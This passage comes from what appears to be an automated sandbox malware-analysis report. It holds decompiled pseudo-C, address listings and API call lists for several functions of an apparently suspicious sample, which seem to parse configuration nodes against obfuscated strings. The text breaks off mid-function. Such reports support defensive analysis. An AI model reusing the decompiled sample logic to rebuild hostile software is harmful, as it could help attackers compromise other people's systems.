      • Part of subcall function 003AEF6B: memcpy.MSVCRT ref: 003AF0AA
      • Part of subcall function 003AEF6B: CryptDestroyKey.ADVAPI32(?), ref: 003AF0B5
      • Part of subcall function 003AEF6B: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003AF0C0
    • memcpy.MSVCRT ref: 003AFCA2
    • memcpy.MSVCRT ref: 003AFCB8
    • memcpy.MSVCRT ref: 003AFCD6
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00398370, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285
    C-Code - Quality: 79%
    			E00398370(void* __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr* _v28;
				char _v228;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t99;
				intOrPtr* _t101;
				intOrPtr* _t102;
				intOrPtr* _t103;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t107;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t127;
				intOrPtr _t131;
				intOrPtr* _t132;
				intOrPtr* _t133;
				intOrPtr* _t136;
				intOrPtr* _t139;
				intOrPtr* _t140;
				signed int _t143;
				intOrPtr _t148;
				signed int _t149;
				intOrPtr _t163;
				intOrPtr _t179;
				intOrPtr _t192;
				void* _t206;
				intOrPtr* _t207;
				void* _t209;
				void* _t210;
				void* _t211;

				_t206 = __ecx;
				_t87 =  *((intOrPtr*)(__ecx + 4));
				_v24 = 0;
				_v8 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				if(_t87 != 0) {
					 *((intOrPtr*)(__ecx + 0x30)) = 0;
					 *((intOrPtr*)(__ecx + 0x34)) = 0;
					 *((intOrPtr*)(__ecx + 0x38)) = 0;
					 *((intOrPtr*)(__ecx + 0x3c)) = 0;
					_t89 =  *((intOrPtr*)( *((intOrPtr*)( *_t87 + 0xb4))))(_t87,  &_v24, _t207);
					__eflags = _t89;
					if(_t89 < 0) {
						L30:
						_t90 = _v20;
					} else {
						_t99 = _v24;
						_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x34))))(_t99,  &_v8);
						__eflags = _t101;
						if(_t101 < 0) {
							goto L30;
						} else {
							__eflags = _t101 - 1;
							if(_t101 == 1) {
								_t90 = _v20;
								_v28 = 1;
							} else {
								while(1) {
									_t102 = _v12;
									__eflags = _t102;
									if(_t102 != 0) {
										__imp__#6(_t102);
									}
									_t103 = _v16;
									_v12 = 0;
									__eflags = _t103;
									if(_t103 != 0) {
										__imp__#6(_t103);
									}
									_t104 = _v8;
									_v16 = 0;
									_t106 =  *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0xa4))))(_t104,  &_v12);
									__eflags = _t106;
									if(_t106 < 0) {
										goto L30;
									}
									_t107 = _v8;
									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t107 + 0x68))))(_t107,  &_v16);
									if(__eflags < 0) {
										goto L30;
									} else {
										E00399090(__eflags,  &_v228, 0x75);
										_t163 =  *0x3b8628; // 0x593938
										_t210 = _t209 + 8;
										__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t163 + 0xe0))))(_v12,  &_v228);
										if(__eflags != 0) {
											E00399090(__eflags,  &_v228, 0x77);
											_t192 =  *0x3b8628; // 0x593938
											_t211 = _t210 + 8;
											__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t192 + 0xe0))))(_v12,  &_v228);
											if(__eflags != 0) {
												E00399090(__eflags,  &_v228, 0x78);
												_t119 =  *0x3b8628; // 0x593938
												_t209 = _t211 + 8;
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0xe0))))(_v12,  &_v228);
												if(__eflags != 0) {
													E00399090(__eflags,  &_v228, 0x79);
													_t123 =  *0x3b8628; // 0x593938
													_t209 = _t209 + 8;
													__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0xe0))))(_v12,  &_v228);
													if(__eflags != 0) {
														E00399090(__eflags,  &_v228, 0x7a);
														_t127 =  *0x3b8628; // 0x593938
														_t209 = _t209 + 8;
														__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t127 + 0xe0))))(_v12,  &_v228);
														if(__eflags != 0) {
															E00399090(__eflags,  &_v228, 0x7b);
															_t131 =  *0x3b8628; // 0x593938
															_t209 = _t209 + 8;
															_t132 =  *((intOrPtr*)( *((intOrPtr*)(_t131 + 0xe0))))(_v12,  &_v228);
															__eflags = _t132;
															if(_t132 != 0) {
																goto L26;
															} else {
																_t139 = E00393070(0, _t206, _t206, _t207, _v8);
																goto L25;
															}
														} else {
															_t139 = E00392220(_t206, _t206, _t207, _v8);
															goto L25;
														}
													} else {
														_t139 = E003953E0(_t206, _t206, _t207, _v8);
														L25:
														__eflags = _t139;
														if(_t139 == 0) {
															goto L30;
														} else {
															goto L26;
														}
													}
												} else {
													_t140 =  *((intOrPtr*)(_t206 + 0x2c));
													__eflags = _t140;
													if(_t140 != 0) {
														_t140 = E0039BB40(_t140);
														_t209 = _t209 + 4;
													}
													__imp__#2(_v16);
													 *((intOrPtr*)(_t206 + 0x2c)) = _t140;
													goto L26;
												}
											} else {
												E00399090(__eflags,  &_v228, 0x76);
												_t179 =  *0x3b8628; // 0x593938
												_t209 = _t211 + 8;
												_t143 =  *((intOrPtr*)( *((intOrPtr*)(_t179 + 0xe0))))(_v16,  &_v228);
												asm("sbb eax, eax");
												 *((intOrPtr*)(_t206 + 0x18)) =  ~_t143 + 1;
												goto L26;
											}
										} else {
											E00399090(__eflags,  &_v228, 0x76);
											_t148 =  *0x3b8628; // 0x593938
											_t209 = _t210 + 8;
											_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t148 + 0xe0))))(_v16,  &_v228);
											asm("sbb eax, eax");
											 *((intOrPtr*)(_t206 + 0x14)) =  ~_t149 + 1;
											L26:
											_t133 = _v8;
											_t207 =  *((intOrPtr*)( *((intOrPtr*)( *_t133 + 0x40))))(_t133,  &_v20);
											__eflags = _t207;
											if(_t207 < 0) {
												goto L30;
											} else {
												_t136 = _v8;
												 *((intOrPtr*)( *((intOrPtr*)( *_t136 + 8))))(_t136);
												_v8 = _v20;
												_t90 = 0;
												_v20 = 0;
												__eflags = _t207 - 1;
												if(_t207 != 1) {
													continue;
												} else {
													_v28 = _t207;
												}
											}
										}
									}
									goto L31;
								}
								goto L30;
							}
						}
					}
					L31:
					__eflags = _t90;
					if(_t90 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t90 + 8))))(_t90);
					}
					_t91 = _v16;
					__eflags = _t91;
					if(_t91 != 0) {
						__imp__#6(_t91);
					}
					_t92 = _v12;
					__eflags = _t92;
					if(_t92 != 0) {
						__imp__#6(_t92);
					}
					_t93 = _v8;
					__eflags = _t93;
					if(_t93 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t93 + 8))))(_t93);
					}
					_t94 = _v24;
					__eflags = _t94;
					if(_t94 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t94 + 8))))(_t94);
					}
					return _v28;
				} else {
					return 0;
				}
			}















































    0x0039837d
    0x0039837f
    0x00398382
    0x00398385
    0x00398388
    0x0039838b
    0x0039838e
    0x00398391
    0x00398396
    0x003983a4
    0x003983a7
    0x003983aa
    0x003983ad
    0x003983ba
    0x003983bc
    0x003983be
    0x00398644
    0x00398644
    0x003983c4
    0x003983c4
    0x003983d1
    0x003983d3
    0x003983d5
    0x00000000
    0x003983db
    0x003983db
    0x003983de
    0x00398638
    0x0039863b
    0x003983e4
    0x003983e4
    0x003983e4
    0x003983e7
    0x003983e9
    0x003983ec
    0x003983ec
    0x003983f2
    0x003983f5
    0x003983f8
    0x003983fa
    0x003983fd
    0x003983fd
    0x00398403
    0x00398409
    0x00398416
    0x00398418
    0x0039841a
    0x00000000
    0x00000000
    0x00398420
    0x0039842f
    0x00398431
    0x00000000
    0x00398437
    0x00398440
    0x00398448
    0x0039844e
    0x00398461
    0x00398463
    0x003984a4
    0x003984ac
    0x003984b2
    0x003984c5
    0x003984c7
    0x00398509
    0x00398511
    0x00398516
    0x00398529
    0x0039852b
    0x00398558
    0x00398560
    0x00398565
    0x00398578
    0x0039857a
    0x00398592
    0x0039859a
    0x0039859f
    0x003985b2
    0x003985b4
    0x003985cc
    0x003985d4
    0x003985d9
    0x003985ea
    0x003985ec
    0x003985ee
    0x00000000
    0x003985f0
    0x003985f6
    0x00000000
    0x003985f6
    0x003985b6
    0x003985bc
    0x00000000
    0x003985bc
    0x0039857c
    0x00398582
    0x003985fb
    0x003985fb
    0x003985fd
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003985fd
    0x0039852d
    0x0039852d
    0x00398530
    0x00398532
    0x00398535
    0x0039853a
    0x0039853a
    0x00398541
    0x00398547
    0x00000000
    0x00398547
    0x003984c9
    0x003984d2
    0x003984da
    0x003984e0
    0x003984f1
    0x003984f5
    0x003984f8
    0x00000000
    0x003984f8
    0x00398465
    0x0039846e
    0x00398476
    0x0039847b
    0x0039848c
    0x00398490
    0x00398493
    0x003985ff
    0x003985ff
    0x0039860e
    0x00398610
    0x00398612
    0x00000000
    0x00398614
    0x00398614
    0x0039861d
    0x00398622
    0x00398625
    0x00398627
    0x0039862a
    0x0039862d
    0x00000000
    0x00398633
    0x00398633
    0x00398633
    0x0039862d
    0x00398612
    0x00398463
    0x00000000
    0x00398431
    0x00000000
    0x003983e4
    0x003983de
    0x003983d5
    0x00398647
    0x00398648
    0x0039864a
    0x00398652
    0x00398652
    0x00398654
    0x00398657
    0x00398659
    0x0039865c
    0x0039865c
    0x00398662
    0x00398665
    0x00398667
    0x0039866a
    0x0039866a
    0x00398670
    0x00398673
    0x00398675
    0x0039867d
    0x0039867d
    0x0039867f
    0x00398682
    0x00398684
    0x0039868c
    0x0039868c
    0x00398696
    0x00398399
    0x0039839f
    0x0039839f

    APIs
    • SysFreeString.OLEAUT32(?), ref: 003983EC
    • SysAllocString.OLEAUT32(?), ref: 00398541
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • SysFreeString.OLEAUT32(?), ref: 003983FD
      • Part of subcall function 00393070: SysFreeString.OLEAUT32(?), ref: 003930C8
      • Part of subcall function 00393070: SysFreeString.OLEAUT32(?), ref: 003930DD
      • Part of subcall function 00393070: SysFreeString.OLEAUT32(?), ref: 00393240
      • Part of subcall function 00393070: SysFreeString.OLEAUT32(?), ref: 0039324E
      • Part of subcall function 00392220: SysFreeString.OLEAUT32(?), ref: 003922D8
      • Part of subcall function 00392220: SysFreeString.OLEAUT32(?), ref: 003923DB
      • Part of subcall function 003953E0: SysFreeString.OLEAUT32(?), ref: 0039549E
      • Part of subcall function 003953E0: SysFreeString.OLEAUT32(?), ref: 003954AF
      • Part of subcall function 003953E0: _wtoi.MSVCRT ref: 003955BB
      • Part of subcall function 003953E0: SysFreeString.OLEAUT32(?), ref: 00395605
      • Part of subcall function 003953E0: SysFreeString.OLEAUT32(?), ref: 00395613
    • SysFreeString.OLEAUT32(?), ref: 0039865C
    • SysFreeString.OLEAUT32(?), ref: 0039866A
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003953E0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213
    C-Code - Quality: 63%
    			E003953E0(intOrPtr __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				void* _v8;
				char _v12;
				char _v16;
				signed int _v20;
				void* _v24;
				signed int _v28;
				char _v36;
				signed int _v40;
				short _v44;
				intOrPtr _v48;
				char _v248;
				void* __ebx;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t90;
				intOrPtr _t94;
				char _t95;
				char _t96;
				intOrPtr* _t97;
				intOrPtr* _t99;
				void* _t101;
				intOrPtr* _t105;
				void* _t110;
				void* _t113;
				void* _t116;
				intOrPtr _t119;
				void* _t122;
				intOrPtr _t140;
				intOrPtr _t166;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				void* _t173;
				void* _t174;
				void* _t175;
				void* _t176;
				void* _t177;

				_t166 = __ecx;
				_v48 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v40 = 0;
				_v8 = 0;
				_v28 = 0;
				_v24 = 0;
				_v44 = 0;
				E0039BB30( &_v36);
				E00395230(__ecx, __ecx);
				_t170 = _a4;
				_push( &_v44);
				_push(_t170);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t170 + 0x58))))() >= 0) {
					if(_v44 != 0xffff) {
						L21:
						_v28 = 1;
						 *((intOrPtr*)(_t166 + 0x20)) = _v20;
						 *((intOrPtr*)(_t166 + 0x28)) = _v40;
					} else {
						_push( &_v24);
						_push(_t170);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t170 + 0x30))))() >= 0) {
							_t90 = _v24;
							_push( &_v20);
							_push(_t90);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t90 + 0x20))))() >= 0) {
								_t94 = E003A1D90(_v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2, 0);
								_t174 = _t173 + 8;
								_v40 = _t94;
								if(_t94 != 0) {
									_t168 = 0;
									if(_v20 <= 0) {
										L20:
										_t166 = _v48;
										goto L21;
									} else {
										_t25 = _t94 + 8; // 0x8
										_t172 = _t25;
										while(1) {
											_t95 = _v12;
											if(_t95 != 0) {
												__imp__#6(_t95);
											}
											_t96 = _v16;
											_v12 = 0;
											if(_t96 != 0) {
												__imp__#6(_t96);
											}
											_t97 = _v24;
											_push( &_v8);
											_v16 = 0;
											_push(_t168);
											_push(_t97);
											if( *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x1c))))() < 0) {
												goto L22;
											}
											_t99 = _v8;
											_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0xa4))))(_t99,  &_v12);
											_t187 = _t101;
											if(_t101 >= 0) {
												E00399090(_t187,  &_v248, 0x7e);
												_t140 =  *0x3b8628; // 0x593938
												_t174 = _t174 + 8;
												_push( &_v248);
												_push(_v12);
												if( *((intOrPtr*)( *((intOrPtr*)(_t140 + 0xe0))))() != 0) {
													L19:
													_t105 = _v8;
													 *((intOrPtr*)( *((intOrPtr*)( *_t105 + 8))))(_t105);
													_t168 = _t168 + 1;
													_t172 = _t172 + 0x18;
													_v8 = 0;
													if(_t168 < _v20) {
														continue;
													} else {
														goto L20;
													}
												} else {
													E0039B1E0(0,  &_v36);
													_t110 = E0039A140( &_v36, _v8);
													_t189 = _t110;
													if(_t110 != 0) {
														E00399090(_t189,  &_v248, 0x27);
														_t175 = _t174 + 8;
														_t44 = _t172 - 8; // 0x0
														_t113 = E00391A10( &_v36,  &_v248, _t44);
														_t190 = _t113;
														if(_t113 != 0) {
															E00399090(_t190,  &_v248, 0x7f);
															_t176 = _t175 + 8;
															_t48 = _t172 - 4; // 0x4
															_t116 = E00391A10( &_v36,  &_v248, _t48);
															_t191 = _t116;
															if(_t116 != 0) {
																E00399090(_t191,  &_v248, 0x80);
																_t177 = _t176 + 8;
																_t119 = E00391A10( &_v36,  &_v248,  &_v16);
																if(_t119 != 0) {
																	__imp___wtoi(_v16);
																	_t174 = _t177 + 4;
																	 *_t172 = _t119;
																	 *((intOrPtr*)(_t172 + 8)) = 0;
																	 *((intOrPtr*)(_t172 + 0xc)) = 0;
																	goto L19;
																}
															}
														}
													}
												}
											}
											goto L22;
										}
									}
								}
							}
						}
					}
				}
				L22:
				_t80 = _v12;
				if(_t80 != 0) {
					__imp__#6(_t80);
				}
				_t81 = _v16;
				if(_t81 != 0) {
					__imp__#6(_t81);
				}
				_t82 = _v8;
				if(_t82 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t82 + 8))))(_t82);
				}
				_t83 = _v24;
				_pop(_t122);
				if(_t83 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t83 + 8))))(_t83);
				}
				L003926B0(_t122,  &_v36);
				return _v28;
			}










































    0x003953ee
    0x003953f3
    0x003953f6
    0x003953f9
    0x003953fc
    0x003953ff
    0x00395402
    0x00395405
    0x00395408
    0x0039540b
    0x0039540e
    0x00395415
    0x0039541a
    0x00395425
    0x00395426
    0x0039542b
    0x00395436
    0x003955ea
    0x003955f0
    0x003955f7
    0x003955fa
    0x0039543c
    0x00395444
    0x00395445
    0x0039544a
    0x00395450
    0x00395458
    0x00395459
    0x00395461
    0x00395475
    0x0039547a
    0x0039547d
    0x00395482
    0x00395488
    0x0039548d
    0x003955e7
    0x003955e7
    0x00000000
    0x00395493
    0x00395493
    0x00395493
    0x00395496
    0x00395496
    0x0039549b
    0x0039549e
    0x0039549e
    0x003954a4
    0x003954a7
    0x003954ac
    0x003954af
    0x003954af
    0x003954b5
    0x003954bb
    0x003954bc
    0x003954c4
    0x003954c5
    0x003954ca
    0x00000000
    0x00000000
    0x003954d0
    0x003954e0
    0x003954e2
    0x003954e4
    0x003954f3
    0x003954fb
    0x00395501
    0x0039550a
    0x00395511
    0x00395516
    0x003955cc
    0x003955cc
    0x003955d5
    0x003955d7
    0x003955d8
    0x003955db
    0x003955e1
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039551c
    0x0039551f
    0x0039552b
    0x00395530
    0x00395532
    0x00395541
    0x00395546
    0x00395549
    0x00395557
    0x0039555c
    0x0039555e
    0x0039556d
    0x00395572
    0x00395575
    0x00395583
    0x00395588
    0x0039558a
    0x00395598
    0x0039559d
    0x003955ae
    0x003955b5
    0x003955bb
    0x003955c1
    0x003955c4
    0x003955c6
    0x003955c9
    0x00000000
    0x003955c9
    0x003955b5
    0x0039558a
    0x0039555e
    0x00395532
    0x00395516
    0x00000000
    0x003954e4
    0x00395496
    0x0039548d
    0x00395482
    0x00395461
    0x0039544a
    0x00395436
    0x003955fd
    0x003955fd
    0x00395602
    0x00395605
    0x00395605
    0x0039560b
    0x00395610
    0x00395613
    0x00395613
    0x00395619
    0x0039561e
    0x00395626
    0x00395626
    0x00395628
    0x0039562f
    0x00395630
    0x00395638
    0x00395638
    0x0039563d
    0x00395648

    APIs
      • Part of subcall function 00395230: SysFreeString.OLEAUT32(00000000), ref: 00395247
      • Part of subcall function 00395230: SysFreeString.OLEAUT32(00000001), ref: 00395255
    • SysFreeString.OLEAUT32(?), ref: 0039549E
    • SysFreeString.OLEAUT32(?), ref: 003954AF
      • Part of subcall function 0039B1E0: SysFreeString.OLEAUT32(?), ref: 0039B1F8
      • Part of subcall function 0039B1E0: SysFreeString.OLEAUT32(?), ref: 0039B201
    • _wtoi.MSVCRT ref: 003955BB
    • SysFreeString.OLEAUT32(?), ref: 00395605
    • SysFreeString.OLEAUT32(?), ref: 00395613
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00399D50, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191
    C-Code - Quality: 64%
    			E00399D50(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v228;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t62;
				intOrPtr* _t63;
				intOrPtr* _t64;
				intOrPtr* _t65;
				intOrPtr* _t69;
				intOrPtr* _t74;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t95;
				intOrPtr* _t99;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t109;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr* _t130;
				intOrPtr* _t138;
				void* _t139;
				void* _t140;
				void* _t141;

				_t102 = __ecx;
				_v20 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				E0039D6A0(__ecx);
				_t59 =  *((intOrPtr*)(__ecx + 4));
				if(_t59 != 0) {
					_t61 =  *((intOrPtr*)( *((intOrPtr*)( *_t59 + 0xb4))))(_t59,  &_v20);
					__eflags = _t61;
					if(_t61 >= 0) {
						_t69 = _v20;
						__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t69 + 0xa4))))(_t69,  &_v12);
						if(__eflags >= 0) {
							E00399090(__eflags,  &_v228, 0x45);
							_t109 =  *0x3b8628; // 0x593938
							_t140 = _t139 + 8;
							_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0xe0))))(_v12,  &_v228);
							__eflags = _t74;
							if(_t74 == 0) {
								_t75 = _v20;
								_t77 =  *((intOrPtr*)( *((intOrPtr*)( *_t75 + 0x34))))(_t75,  &_v8);
								__eflags = _t77;
								if(_t77 >= 0) {
									__eflags = _t77 - 1;
									if(_t77 == 1) {
										L20:
										_v28 = 1;
									} else {
										while(1) {
											_t78 = _v12;
											__eflags = _t78;
											if(_t78 != 0) {
												__imp__#6(_t78);
											}
											_t79 = _v16;
											_v12 = 0;
											__eflags = _t79;
											if(_t79 != 0) {
												__imp__#6(_t79);
											}
											_t80 = _v8;
											_v16 = 0;
											_t82 =  *((intOrPtr*)( *((intOrPtr*)( *_t80 + 0xa4))))(_t80,  &_v12);
											__eflags = _t82;
											if(_t82 < 0) {
												goto L21;
											}
											_t83 = _v8;
											__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x68))))(_t83,  &_v16);
											if(__eflags >= 0) {
												E00399090(__eflags,  &_v228, 0x46);
												_t114 =  *0x3b8628; // 0x593938
												_t141 = _t140 + 8;
												_t130 =  *((intOrPtr*)(_t114 + 0xe0));
												__eflags =  *_t130(_v12,  &_v228);
												if(__eflags != 0) {
													E00399090(__eflags,  &_v228, 0x47);
													_t116 =  *0x3b8628; // 0x593938
													_t140 = _t141 + 8;
													_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0xe0))))(_v12,  &_v228);
													__eflags = _t91;
													if(_t91 != 0) {
														goto L18;
													} else {
														_t99 = E0039BF60(_t102, _v8);
														__eflags = _t99;
														if(_t99 != 0) {
															goto L18;
														}
													}
												} else {
													_t100 = _v16;
													__imp___wtoi(_t100);
													asm("cdq");
													_t140 = _t141 + 4;
													 *((intOrPtr*)(_t102 + 0x10)) = _t100;
													 *((intOrPtr*)(_t102 + 0x14)) = _t130;
													L18:
													_t92 = _v8;
													_t138 =  *((intOrPtr*)( *((intOrPtr*)( *_t92 + 0x40))))(_t92,  &_v24);
													__eflags = _t138;
													if(_t138 >= 0) {
														_t95 = _v8;
														 *((intOrPtr*)( *((intOrPtr*)( *_t95 + 8))))(_t95);
														_v8 = _v24;
														_v24 = 0;
														__eflags = _t138 - 1;
														if(_t138 != 1) {
															continue;
														} else {
															goto L20;
														}
													}
												}
											}
											goto L21;
										}
									}
									L21:
								}
							}
						}
					}
					_t62 = _v16;
					__eflags = _t62;
					if(_t62 != 0) {
						__imp__#6(_t62);
					}
					_t63 = _v12;
					__eflags = _t63;
					if(_t63 != 0) {
						__imp__#6(_t63);
					}
					_t64 = _v8;
					__eflags = _t64;
					if(_t64 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t64 + 8))))(_t64);
					}
					_t65 = _v20;
					__eflags = _t65;
					if(_t65 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t65 + 8))))(_t65);
					}
					return _v28;
				} else {
					return 0;
				}
			}







































    0x00399d5d
    0x00399d5f
    0x00399d62
    0x00399d65
    0x00399d68
    0x00399d6b
    0x00399d6e
    0x00399d71
    0x00399d76
    0x00399d7b
    0x00399d92
    0x00399d94
    0x00399d96
    0x00399d9c
    0x00399dae
    0x00399db0
    0x00399dbf
    0x00399dc7
    0x00399dcd
    0x00399dde
    0x00399de0
    0x00399de2
    0x00399de8
    0x00399df5
    0x00399df7
    0x00399df9
    0x00399e00
    0x00399e03
    0x00399f16
    0x00399f16
    0x00000000
    0x00399e10
    0x00399e10
    0x00399e13
    0x00399e15
    0x00399e18
    0x00399e18
    0x00399e1e
    0x00399e21
    0x00399e24
    0x00399e26
    0x00399e29
    0x00399e29
    0x00399e2f
    0x00399e35
    0x00399e42
    0x00399e44
    0x00399e46
    0x00000000
    0x00000000
    0x00399e4c
    0x00399e5b
    0x00399e5d
    0x00399e6c
    0x00399e74
    0x00399e7a
    0x00399e84
    0x00399e8d
    0x00399e8f
    0x00399eb0
    0x00399eb8
    0x00399ebe
    0x00399ecf
    0x00399ed1
    0x00399ed3
    0x00000000
    0x00399ed5
    0x00399edb
    0x00399ee0
    0x00399ee2
    0x00000000
    0x00000000
    0x00399ee2
    0x00399e91
    0x00399e91
    0x00399e95
    0x00399e9b
    0x00399e9c
    0x00399e9f
    0x00399ea2
    0x00399ee4
    0x00399ee4
    0x00399ef3
    0x00399ef5
    0x00399ef7
    0x00399ef9
    0x00399f02
    0x00399f07
    0x00399f0a
    0x00399f0d
    0x00399f10
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00399f10
    0x00399ef7
    0x00399e8f
    0x00000000
    0x00399e5d
    0x00399e10
    0x00399f1d
    0x00399f1d
    0x00399df9
    0x00399de2
    0x00399db0
    0x00399f1e
    0x00399f21
    0x00399f23
    0x00399f26
    0x00399f26
    0x00399f2c
    0x00399f2f
    0x00399f31
    0x00399f34
    0x00399f34
    0x00399f3a
    0x00399f3d
    0x00399f3f
    0x00399f47
    0x00399f47
    0x00399f49
    0x00399f4c
    0x00399f4e
    0x00399f56
    0x00399f56
    0x00399f60
    0x00399d7e
    0x00399d84
    0x00399d84

    APIs
    • SysFreeString.OLEAUT32(?), ref: 00399E18
    • SysFreeString.OLEAUT32(?), ref: 00399E29
    • _wtoi.MSVCRT ref: 00399E95
      • Part of subcall function 0039BF60: SysFreeString.OLEAUT32(?), ref: 0039C049
      • Part of subcall function 0039BF60: SysFreeString.OLEAUT32(?), ref: 0039C05E
      • Part of subcall function 0039BF60: _wtoi.MSVCRT ref: 0039C115
      • Part of subcall function 0039BF60: rand.MSVCRT ref: 0039C160
      • Part of subcall function 0039BF60: SysFreeString.OLEAUT32(?), ref: 0039C2AE
      • Part of subcall function 0039BF60: SysFreeString.OLEAUT32(?), ref: 0039C2BC
    • SysFreeString.OLEAUT32(?), ref: 00399F26
    • SysFreeString.OLEAUT32(?), ref: 00399F34
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003928E0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 170
    C-Code - Quality: 65%
    			E003928E0(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v232;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr* _t57;
				intOrPtr* _t58;
				intOrPtr* _t59;
				intOrPtr* _t60;
				intOrPtr* _t66;
